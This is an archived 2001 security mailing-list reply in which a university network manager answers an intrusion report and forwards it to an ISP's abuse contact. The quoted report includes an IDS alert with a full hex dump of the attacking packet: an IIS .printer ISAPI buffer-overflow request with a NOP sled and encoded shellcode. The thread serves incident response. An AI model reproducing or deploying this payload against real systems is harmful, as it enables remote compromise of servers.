Re: Attempted WEB-IIS printer attempt Buffer Overflow

From: Doug Nelson (nelsonat_private)
Date: Tue Jul 17 2001 - 08:15:05 PDT

  • Next message: Nick FitzGerald: "Re: SMTP server (How can I find out the real source of an attack"

    > Date of Attack:  Jul 14, 2001
    > Time of Attack: 09:00:38 am EDT
    > 
    > Source of Attack: 
    > IP Address: 198.109.163.170
    > 
    > Destination of Attack:
    > IP Address: 216.18.61.98
    > Port: 80
    > Protocol: TCP
    > 
    > 
    > Description: 
    > - Intruder attempted to access the printer isapi filter.
    > 
    > Link: http://www.whitehats.com/info/IDS533
    
    The IP address in question belongs to AT&T Broadband and Information
    Services in East Lansing.  I have passed your message on to
    "abuseat_private" for further action.
    
    Doug Nelson			nelsonat_private
    Network Manager			Ph: (517) 353-2980
    Computer Laboratory
    Michigan State University
    
    
    > [**] WEB-IIS printer attempt [**]
    > Jul 14,01 09:00:38am    198.109.163.170:3265 -> 216.18.61.98:80
    > TTL: 46 TOS: 0x0        ID:1675
    > ***AP*** Seq: 3550615295 Ack: 2075228853 Win: 32120
    > 
    > 474554202F4E554C4C2E7072696E746572204854       GET./NULL.printer.HT
    > 54502F312E300D0A4265617675683A2090909090        TP/1.0..Beavuh:.....
    > 90909090909090909090909090909090EB035DEB        ..................].
    > 05E8F8FFFFFF83C5159090908BC533C966B9D702        ..............3.f...
    > 5080309540E2FA2D959564E214ADD8CF0595E196        P.0.@..-..d.........
    > DD7E607D95959595C81E40147F9A6B6A6A1E4D1E        .~`}......@...kjj.M.
    > E6A996661EE3ED96661EEBB5966E1EDB81A678C3        ...f....f....n....x.
    > C2C41EAA966E1E672C9B9595956633E19DCCCA16        .....n.g,....f3.....
    > 5291D07772CCCACB1E581ED3B1965644749654A6        R..wr....X....VDt.T.
    > 5CF31E9D1ED389965654749796541E9596561E67        \.......VTt..T...V.g
    > 1E6B1E452C9E9595957DE1949595A655391055E0        .k.E,....}.....U9.U.
    > 6CC7C36AC241CF1E4D2C939595957DCE94959552        l..j.A..M,....}....R
    > D2F19995959552D2FD9595959552D2F994959595        ......R......R......
    > FF9518D2F1C518D285C518D281C56AC255FF9518        ..............j.U...
    > D2F1C518D28DC518D289C56AC25552D2B5D19595        ...........j.UR.....
    > 9518D2B5C56AC2511ED2851CD2C91CD2F51ED289        .....j.Q............
    > 1CD2CD14DAD994949595F352D2C5959518D2E5C5        ...........R........
    > 18D2B5C5A655C5C5C5FF94C5C57D95959595C814        .....U.......}......
    > 78D56B6A6AC0C56AC25D6AE2856AC2716AE2896A        x.kjj..j.]j..j.qj..j
    > C271FD95919595FFD56AC2451E7DC5FD94949595        .q.......j.E.}......
    > 6AC27D10559A103F959595A655C5D5C5D5C56AC2        j.}.U..?....U.....j.
    > 79166D6A9A11029595951E4DF352929795F352D2        y.mj.......M.R....R.
    > 9796ED52D291AA8D3EB6FF851892C5C66AC261FF        ...R....>.......j.a.
    > A76AC249A65CC4C3C4C4C46AE2816AC2591055E1        .j.I.\.....j..j.Y.U.
    > F50505050515AB95E1BA05050505FF95C3FD9591        ....................
    > 9595C06AE2816AC24D1055E1D505050505FF956A        ...j..j.M.U........j
    > A3C0C66AC26D166D6AE1BB050505057E27FF95FD        ...j.m.mj......~'...
    > 95919595C0C66AC2691055E98D05050505E109FF        ......j.i.U.........
    > 95C3C5C06AE28D6AC241FFA76AC2497E1FC66AC2        ....j..j.A..j.I~..j.
    > 65FF956AC275A655391055E06CC4C7C3C66A47CF        e..j.u.U9.U.l....jG.
    > CC3E777B56D2F0E1C5E7FAF6D4F1F1E7F0E6E695        .>w{V...............
    > D9FAF4F1D9FCF7E7F4E7ECD495D6E7F0F4E1F0C5        ....................
    > FCE5F095D2F0E1C6E1F4E7E1E0E5DCFBF3FAD495        ....................
    > D6E7F0F4E1F0C5E7FAF6F0E6E6D495C5F0F0FEDB        ....................
    > F4F8F0F1C5FCE5F095D2F9FAF7F4F9D4F9F9FAF6        ....................
    > 95C2E7FCE1F0D3FCF9F095C7F0F4F1D3FCF9F095        ....................
    > C6F9F0F0E595D0EDFCE1C5E7FAF6F0E6E695D6F9        ....................
    > FAE6F0DDF4FBF1F9F095C2C6DAD6DEA6A795C2C6        ....................
    > D4C6E1F4E7E1E0E595E6FAF6FEF0E195F6F9FAE6        ....................
    > F0E6FAF6FEF0E195F6FAFBFBF0F6E195E6F0FBF1        ....................
    > 95E7F0F6E395F6F8F1BBF0EDF0950D0A486F7374        ................Host
    > 3A20909090909090909090909090909090909090        :...................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 9090909090909090909090909090909090909090        ....................
    > 909090909090909090909033C0B09003D88B038B        ...........3........
    > 406033DBB32403C3FFE0EBB9909005318C6A0D0A        @`3..$.........1.j..
    > 0D0A                                            ..                  
    > 
    > 
    > ---
    > Jason Robertson                
    > Network Analyst            
    > jasonat_private    
    > http://www.astroadvice.com      
    > 
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 10:14:22 PDT